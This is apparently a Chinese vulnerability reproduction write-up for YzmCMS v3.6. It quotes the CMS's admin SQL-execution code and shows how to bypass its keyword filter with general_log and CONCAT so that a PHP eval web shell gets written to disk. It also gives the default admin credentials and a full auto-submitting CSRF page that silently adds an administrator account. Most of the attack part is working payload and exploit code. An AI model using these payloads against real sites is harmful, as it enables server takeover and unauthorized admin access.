# YzmCMS v3.6 csrf

## 一、漏洞简介

## 二、漏洞影响

YzmCMS v3.6

## 三、复现过程

1、文件位置: /application/admin/controller/sql.class.php第10-42行中：

public function init() {
 if(isset($\_POST['sqlstr'])){
 if(!C('sql\_execute')) showmsg('根据系统配置，不允许在线执行SQL命令！', 'stop');
 $sqlstr = MAGIC\_QUOTES\_GPC ? stripslashes($\_POST['sqlstr']) : $\_POST['sqlstr'];
 $sqlstr = rtrim(trim($sqlstr), ';');
 $sqls = $\_POST['action']=='many' ? explode(';', $sqlstr) : array(0 => $sqlstr);

 $admin = D('admin');
 foreach($sqls as $sql){
10. if(stristr($sql, 'outfile')){
11. $str = '<span class="c-red">ERROR : 检测到非法字符 “outfile”！</span>';
12. break;
13. }
14. if(stristr($sql, '.php')){
15. $str = '<span class="c-red">ERROR : 检测到非法字符 “.php” ！</span>';
16. break;
17. }
18. if(preg\_match("/^drop(.\*)database/i", $sql)){
19. $str = '<span class="c-red">ERROR : 不允许删除数据库！</span>';
20. break;
21. }
22. $result = $admin->query($sql);
23. if($result){
24. $str = '<span style="color:green">OK : 执行成功！</span>';
25. if(is\_object($result) || is\_resource($result)){
26. $arr = $admin->fetch\_all($result);
27. }
28. }else{
29. $str = '<span class="c-red">ERROR : 执行失败！</span>';
30. break;
31. }
32. }
33. }

这段函数中对提交的sql参数进行还原处理，然后进行非法字符检测，检测字符是否存在”oufile”、”.php”,匹配是否有删除数据的操作等。

2、如何绕过这种限制？

首页，outfile被禁止，第一时间想到的就是SQL语句利用日志写入文件，但是写入脚本文件”.php”会被检测到非法字符；然后，尝试MySQL中concat函数来连接字符串，拆分’.php’关键词，如 CONCAT("test.","php");最后构造出可以写入文件，绕过非法字符检测的的SQL语句，从而触发代码执行漏洞，控制服务器。

Payload：

show variables like '%general%'; #查看配置
set global general\_log = on; #开启general log模式
set global general\_log\_file =CONCAT("E:\\study\\WWW\\YzmCMS\\test.","php");
select '<?php eval($\_POST[cmd]);?>'; #写入shell

### 漏洞复现

#### 如何获取后台管理员权限

有两种思路：

思路A：通过默认信息，弱口令登录

默认后台路径：<http://www.0-sec.org/admin/index/login.html>

管理员默认账号密码均为：yzmcms

思路B：通过CSRF漏洞，诱导管理员访问，自动在后台添加管理员账号。

CSRF漏洞利用代码如下：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>
<body οnlοad="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "68" );

 function pausecomp(millis)

 {

 var date = new Date();
 var curDate = null;

 do { curDate = new Date(); }
 while(curDate-date < millis);
 }

 function fireForms()

 {

 var count = 1;
 var i=0;

 for(i=0; i<count; i++)
 {
 document.forms[i].submit();

 pausecomp(pauses[i]);
 }
 }

 </script>

 <H2>OWASP CRSFTester Demonstration</H2>

 <form method="POST" name="form0" action="http://127.0.0.1:80/admin/admin\_manage/add.html">

 <input type="hidden" name="adminname" value="admin"/>

 <input type="hidden" name="password" value="abc123!"/>

 <input type="hidden" name="password2" value="abc123!"/>

 <input type="hidden" name="email" value=""/>

 <input type="hidden" name="realname" value=""/>

 <input type="hidden" name="roleid" value="1"/>

 <input type="hidden" name="dosubmit" value="1"/>

 </form>

 </body>

 </html>